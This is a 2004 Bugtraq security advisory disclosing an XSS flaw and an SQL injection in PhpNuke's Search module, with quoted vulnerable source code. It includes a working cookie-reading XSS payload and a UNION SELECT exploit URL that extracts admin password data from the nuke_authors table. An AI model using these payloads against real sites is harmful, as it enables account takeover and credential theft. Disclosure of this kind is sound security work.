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Message-ID: <20040716221441.32520.qmail@www.securityfocus.com>
Date: 16 Jul 2004 22:14:41 -0000
From: Janek Vind <come2waraxe@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [waraxe-2004-SA#035 - Multiple security holes in PhpNuke - part 2]






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{                 [ Multiple security holes in PhpNuke - part 2]                 }
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Author: Janek Vind "waraxe"
Date: 17. July 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=35


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it's freeware, easy to install and has broad set of features.

Homepage: http://phpnuke.org



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This time we will look @ security holes - 1 XSS and 1 sql inject case -  
in "Search" module.


A - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - xss in "/modules/Search/index.php":

Open search page in phpnuke:

http://localhost/nuke73/modules.php?name=Search

and enter to input field something like this:

1"><body onload="alert(document.cookie);

In case of other browsers than IE xss exploiting method can be modified, but one thing
is sure - xss case exists here...


B - Sql Injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B1 - critical sql injection case in "/modules/Search/index.php":

Well, let's look at source code from that script:

----------------[ original source ]-----------------
} elseif ($type == "comments" AND isset($sid)) {
	$res = $db->sql_query("select title from ".$prefix."_stories where sid='$sid'");
	list($st_title) = $db->sql_fetchrow($res);
	$instory = "AND sid='$sid'";
	echo "<center><font class=\"title\"><b>"._SEARCHINSTORY." $st_title</b></font></center><br>";
} else {
	echo "<center><font class=\"title\"><b>"._SEARCHIN." $topictext</b></font></center><br>";
}
----------------[/original source ]-----------------

So - if search type is "comments" and there is no "sid" specified, then sql query 
fragment "instory" is not initialized. Now, let's look further:


----------------[ original source ]-----------------
} elseif ($type=="comments") {
...
...
	$result8 = $db->sql_query("SELECT tid, sid, subject, date, name from
	 ".$prefix."_comments where (subject like '%$query%' OR comment like '%$query%')
	 $instory order by date DESC limit $min,$offset");
...
...
----------------[/original source ]-----------------

What is here, is a typical case of uninitialized variable - "instory".
It's time to turn this little bug to something evil:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Search&type=comments&
query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

----------------[/real life exploit ]---------------

... and we see all the secret information about admins :)

Have a nice day!


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Fixing tutorials, discussion, help - look at http://www.waraxe.us/forums.html

See ya there!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix and slimjim100!
Tervitused - Heintz ja Maku!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

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